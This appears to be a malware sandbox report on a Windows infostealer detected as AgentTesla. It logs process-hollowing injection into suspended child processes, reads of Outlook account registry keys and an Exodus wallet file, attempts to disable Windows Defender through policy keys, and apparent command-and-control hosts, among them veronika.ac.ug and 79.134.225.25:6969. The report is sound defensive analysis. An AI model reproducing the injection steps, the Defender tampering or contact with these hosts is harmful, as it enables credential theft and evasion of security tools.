reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000634
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0
registry HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
process axcxcvhgfc.exe useragent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
process KqbKspamd9.exe useragent zipo
process KqbKspamd9.exe useragent daso
process oxcxcvhgfc.exe useragent
Process injection Process 1684 called NtSetContextThread to modify thread in remote process 2524
Process injection Process 260 called NtSetContextThread to modify thread in remote process 1188
Process injection Process 2504 called NtSetContextThread to modify thread in remote process 3056
Process injection Process 2632 called NtSetContextThread to modify thread in remote process 2408
Process injection Process 2552 called NtSetContextThread to modify thread in remote process 2984
Process injection Process 1016 called NtSetContextThread to modify thread in remote process 2164
Process injection Process 736 called NtSetContextThread to modify thread in remote process 1920
Process injection Process 2620 called NtSetContextThread to modify thread in remote process 1164
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4447323
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004f4
process_identifier: 2524
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4302468
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004fc
process_identifier: 1188
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4245278
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000398
process_identifier: 3056
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4291211
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002ac
process_identifier: 2408
1 0 0

NtSetContextThread

 registers.eip: 77365248
registers.esp: 53935056
registers.edi: 0
registers.eax: 4361964
registers.ebp: 431460
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000534
process_identifier: 2984
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4219246
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002ac
process_identifier: 2164
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4209646
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002ac
process_identifier: 1920
1 0 0

NtSetContextThread

 registers.eip: 5348
registers.esp: 69242152
registers.edi: 0
registers.eax: 4200932
registers.ebp: 5344
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000524
process_identifier: 1164
1 0 0
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
Process injection Process 1684 resumed a thread in remote process 2524
Process injection Process 260 resumed a thread in remote process 1188
Process injection Process 2504 resumed a thread in remote process 3056
Process injection Process 2632 resumed a thread in remote process 2408
Process injection Process 2552 resumed a thread in remote process 2984
Process injection Process 1016 resumed a thread in remote process 2164
Process injection Process 736 resumed a thread in remote process 1920
Process injection Process 2620 resumed a thread in remote process 1164
Process injection Process 1940 resumed a thread in remote process 2316
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000004f4
suspend_count: 1
process_identifier: 2524
1 0 0

NtResumeThread

 thread_handle: 0x000004fc
suspend_count: 1
process_identifier: 1188
1 0 0

NtResumeThread

 thread_handle: 0x00000398
suspend_count: 1
process_identifier: 3056
1 0 0

NtResumeThread

 thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 2408
1 0 0

NtResumeThread

 thread_handle: 0x00000534
suspend_count: 1
process_identifier: 2984
1 0 0

NtResumeThread

 thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 2164
1 0 0

NtResumeThread

 thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 1920
1 0 0

NtResumeThread

 thread_handle: 0x00000524
suspend_count: 1
process_identifier: 1164
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2316
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Time & API Arguments Status Return Repeated

WNetGetProviderNameW

 net_type: 0x00250000
1222 0
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.75637
FireEye Generic.mg.e02ae8a88df1daa8
Cyren W32/MSIL_Agent.BZK.gen!Eldorado
Symantec Scr.Malcode!gdn30
ESET-NOD32 a variant of MSIL/Kryptik.ABGJ
APEX Malicious
Avast Win32:MalwareX-gen [Trj]
Kaspersky HEUR:Trojan-PSW.MSIL.Agensla.gen
BitDefender Trojan.GenericKDZ.75637
Ad-Aware Trojan.GenericKDZ.75637
Sophos ML/PE-A
Emsisoft Trojan.GenericKDZ.75637 (B)
Paloalto generic.ml
MAX malware (ai score=89)
Microsoft Trojan:MSIL/AgentTesla.BFF!MTB
Malwarebytes Spyware.TelegramBot
SentinelOne Static AI - Suspicious PE
Fortinet MSIL/Kryptik.ZXG!tr
MaxSecure Trojan.Malware.300983.susgen
AVG Win32:MalwareX-gen [Trj]
Panda Trj/GdSda.A
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1684
1 0 0

NtResumeThread

 thread_handle: 0x00000154
suspend_count: 1
process_identifier: 1684
1 0 0

NtResumeThread

 thread_handle: 0x00000190
suspend_count: 1
process_identifier: 1684
1 0 0

NtResumeThread

 thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 1684
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtSetContextThread

 registers.eip: 1920740228
registers.esp: 2542248
registers.edi: 2542424
registers.eax: 14305600
registers.ebp: 2542468
registers.edx: 1
registers.ebx: 0
registers.esi: 0
registers.ecx: 32
thread_handle: 0x000000e8
process_identifier: 1684
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 1684
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtGetContextThread

 thread_handle: 0x000000e8
1 0 0

NtResumeThread

 thread_handle: 0x000000e8
suspend_count: 1
process_identifier: 1684
1 0 0

NtResumeThread

 thread_handle: 0x000003e0
suspend_count: 1
process_identifier: 1684
1 0 0

CreateProcessInternalW

 thread_identifier: 2540
thread_handle: 0x0000054c
process_identifier: 260
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000554
1 1 0

CreateProcessInternalW

 thread_identifier: 2764
thread_handle: 0x000004f4
process_identifier: 2524
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\zxcvb.exe
track: 1
command_line: "{path}"
filepath_r: C:\Users\test22\AppData\Local\Temp\zxcvb.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000004ec
1 1 0

NtGetContextThread

 thread_handle: 0x000004f4
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2524
region_size: 598016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004ec
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌNäˆ/ŠOˆ/ŠOˆ/ŠOÓG‰N™/ŠOÓGN4/ŠOÓGN‰/ŠO]BŽN›/ŠO]B‰N/ŠO]BNÚ/ŠOÓGŽN‘/ŠOÓGŒN‰/ŠOÓG‹N“/ŠOˆ/‹Ox/ŠOAƒN‡/ŠOAˆN‰/ŠORichˆ/ŠOPELIJW`à Žt[Ü @ @ÐBÀL[Ø8HØ@ ¤.text}ŒŽ `.rdataP¸ º’@@.data\`LL@À.relocL[À\˜@B
base_address: 0x00400000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0046a000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00486000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0048c000
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2524
process_handle: 0x000004ec
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4447323
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004f4
process_identifier: 2524
1 0 0

NtResumeThread

 thread_handle: 0x000004f4
suspend_count: 1
process_identifier: 2524
1 0 0

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 260
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 260
1 0 0

NtResumeThread

 thread_handle: 0x00000198
suspend_count: 1
process_identifier: 260
1 0 0

NtResumeThread

 thread_handle: 0x000002a4
suspend_count: 1
process_identifier: 260
1 0 0

NtResumeThread

 thread_handle: 0x000003e0
suspend_count: 1
process_identifier: 260
1 0 0

CreateProcessInternalW

 thread_identifier: 2120
thread_handle: 0x0000054c
process_identifier: 2632
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000554
1 1 0

CreateProcessInternalW

 thread_identifier: 2472
thread_handle: 0x000004f8
process_identifier: 2112
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
track: 1
command_line: "{path}"
filepath_r: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000004f0
1 1 0

NtGetContextThread

 thread_handle: 0x000004f8
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2112
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f0
3221225496 0

CreateProcessInternalW

 thread_identifier: 1816
thread_handle: 0x000004fc
process_identifier: 1188
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
track: 1
command_line: "{path}"
filepath_r: C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000004f4
1 1 0

NtGetContextThread

 thread_handle: 0x000004fc
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1188
region_size: 131072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004f4
1 0 0

WriteProcessMemory

 buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ ˜$„¦°@@Оà\CODE°–˜ `DATAl°œ@ÀBSSÅÀ¤À.idatažÐ¤@À.reloc\à¬@PÄ@P
base_address: 0x00400000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

 buffer: @2‹À@@@\@ì @l$@ËÌÈÉ×ÏÈÍÎÛØÚÙÊÜÝÞßàáãäå@Error‹ÀRuntime error at 00000000‹À0123456789ABCDEFÿÿÿÿàO@‹À‹À@@J7<äºÏ¿}ªiFîµä[Jú-EœÝ]³QçëqØ'ÓØ'ÓØ'ÖØ7nØ$ÓsØ$ÓsØ$nsØ7ÓsØ7ÖsØ$ÓØ7Ø7ÖØ7ÖsØ$ÓØ$nsØ$nsØ7Ø$ÓØ$nsØ$nsØ7ÖsØ$ÓsØÔØ'ØØsØXØ$ÓØ'ÖØqØ'ÖؖáveÛe3ôs>v÷†E±Yêá)­Vû˜Ar5d2Š'òÂØMY‰ pê5ù©ñÌ-þ+~•R¶Ö”æÐvMºoß3 v§·5v…ÅÞƒ¸`‡6©¤á þáx.¢WŽ‹ï)b!ò²jíïz´Ì·|X—¸q/Õæ?dEzãîs£‹3Ãhp>4Ǝ7èˆJ|—úðØèëá¾iAò¡úèÌ3áHþ‰‡ˆíG\†rgã@À Œ¥[\ë¸?áRÃénS ÑÒ-´¼;ÐÍñ[MQ¶SEvr]‚`„U¥’ÝêŽ(èú†mü'~àÖ.‘ÚÅÂÅÈ3Â%G°’j°Uî½S:Ì¦æä[½V€¿v™z½åÁL}¸<ÿ,9ŠÞýžV_‹ƒ:Â9 ‘牽˜W‡ù™ÙÔەoŸSûËۓ`Qé6ñ¡àw—Ëm¥Anm'o-”°aÃе1ä¨ 5[þ'Çè ©Ð¦¿q ¤ÞÆ +ºê$›gÌ7¶G~Ø: ðDºÜÑk½´úÓæ`¸{ÈQÖÎ*<A…æ>5²+X2`*ÿ0e¢÷¼Aâ@ŽPD„%ÌÐÒ:¨»eŠfk®Z‹¨ÃÌPÒÕ*”cÕéN{» “¨¤…¦b«?O±óÝ0ZR‡ÔžèÌÚÃOË©¤×`TwR\ŽÀàÄËÃÐÃsS¦@O±j¹ ›}¢ì J˜g_ÍYljò‘ ˜@Ž'”¸…PÂZ°)zˆãp>cƒŒXgǼ|½\ÏODn…á)ü7Lôû8ažŒ³Ô´:3ªÆô딛¥ø‘GgPnº1½·Õ“Ô^)õ/2{ۘ¸<T¾i#©È7ný_Fû^îˆnB!ôëäRÛc-dèmàÇ«>WÆÄN䨂«$há:_p”$Öd^}QÏ ˜kï8áeÏÌË%VŒ¿âFNØ\ðø•G;æ1Èy¤SÇ,•„°!#fñŽ‰Äþ j®Þ Ø|íälçÇ+Æڏ E—Å Å$ŒÜ›¶Dë Í!kù,ú"dlQ(° ÇMIÎ,p#°)]”ÕÙ9i-0‚àl&‘®ª!YіoPÝ+¾‡9•}\±¡©Ù.¿4#D.•§×è¼R I±£ç— 1ÔTû_v¿tÂmÿóJQ÷Ð\pk+Fæ*_h:÷Ù ‡æÄ £ 8 c+-’û2_öš0ýcQò¸ dt‰µ+ûÞ™¸¦åð‰#t êqêR(PY» ïÀ(¢#ÓϘÆ”ÌzÓ ¯N$ÇAÇAôÆApÇA¤ÆA„ÇA@ÇAhÇAlÆA,ÇA¼ÆAÇA°ÆAÆAÄÆA´°A”ÇAÇAˆÇA(ÈA\ÇAüÆA4ÇA|ÆAŒÆAìÆA ÇA<ÇA¸°AèÆA¤ÇA°°AÀÆAŒÇA¸ÆAdÆA°ÇAðÆA ÇA´ÆA(ÇAÈÇAØ°A¼°A˜ÆA ÇAÇAÇAœÆA ÆA8ÇA¬ÆAPÇA¬ÇAˆÆALÇAøÆAÌÆADÇA`ÇA¬°A ÈA¨ÇA˜ÇAÇAÈÆA€ÆAœÇA”ÆA0ÇAhÆAHÇA´ÇAveronika.ac.ug
base_address: 0x0041b000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

 buffer: ,ÒÜÐ ÔHÑXÔXјÔhÑàÔxÑÕ€Ñ8ՐѺÖðÑ*× Òp× Ò:ÒRÒjÒ‚ÒžÒ¬Ò¼ÒÈÒÖÒæÒÓÓ$Ó:ÓPÓbÓtӊӜӮӼÓÊÓÖÓòÓþÓÔ,Ô>ÔLÔfÔzÔŠÔ¦Ô¶ÔÌÔîÔÕ Õ.ÕFÕRÕZÕfÕxÕˆÕ˜Õ¦Õ¶ÕÆÕØÕìÕÖÖ.ÖBÖPÖ`ÖrÖ~֌֚֮ÖÄÖÔÖäÖðÖ× ×6×B×V×^×z׊×kernel32.dllDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionVirtualFreeVirtualAllocLocalFreeLocalAllocGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdWideCharToMultiByteMultiByteToWideCharGetThreadLocaleGetStartupInfoAGetModuleFileNameAGetLocaleInfoAGetCommandLineAFreeLibraryExitProcessWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleuser32.dllGetKeyboardTypeMessageBoxACharNextAadvapi32.dllRegQueryValueExARegOpenKeyExARegCloseKeyoleaut32.dllSysFreeStringSysReAllocStringLenSysAllocStringLenkernel32.dllGetModuleHandleAadvapi32.dllRegOpenKeyExARegEnumKeyAFreeSidkernel32.dllWriteFileSleepLocalFreeLoadLibraryExWLoadLibraryAGlobalUnlockGlobalLockGetTickCountGetSystemInfoGetProcAddressGetModuleHandleAGetModuleFileNameAGetFileAttributesWGetCurrentProcessIdGetCurrentProcessFreeLibraryFindNextFileWFindFirstFileWFindCloseExitProcessDeleteFileWCreateDirectoryWCopyFileWgdi32.dllSelectObjectDeleteObjectDeleteDCCreateCompatibleDCCreateCompatibleBitmapBitBltuser32.dllReleaseDCGetSystemMetricsGetDCCharToOemBuffAole32.dllOleInitializeCoCreateInstance
base_address: 0x0041d000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0041e000
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 1188
process_handle: 0x000004f4
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4302468
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004fc
process_identifier: 1188
1 0 0

NtResumeThread

 thread_handle: 0x000004fc
suspend_count: 1
process_identifier: 1188
1 0 0

NtResumeThread

 thread_handle: 0x00000144
suspend_count: 1
process_identifier: 2524
1 0 0

CreateProcessInternalW

 thread_identifier: 2520
thread_handle: 0x000007cc
process_identifier: 2504
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007d4
1 1 0

CreateProcessInternalW

 thread_identifier: 604
thread_handle: 0x000007cc
process_identifier: 2552
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007d8
1 1 0

CreateProcessInternalW

 thread_identifier: 1116
thread_handle: 0x0000079c
process_identifier: 1016
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007c0
1 1 0

CreateProcessInternalW

 thread_identifier: 1764
thread_handle: 0x000007d0
process_identifier: 736
current_directory: C:\Users\test22\AppData\LocalLow
filepath: C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007d8
1 1 0
dead_host 192.168.56.101:49325
dead_host 79.134.225.25:6969
dead_host 192.168.56.101:49302
dead_host 192.168.56.101:49314
dead_host 192.168.56.101:49332
dead_host 192.168.56.101:49313
dead_host 192.168.56.101:49334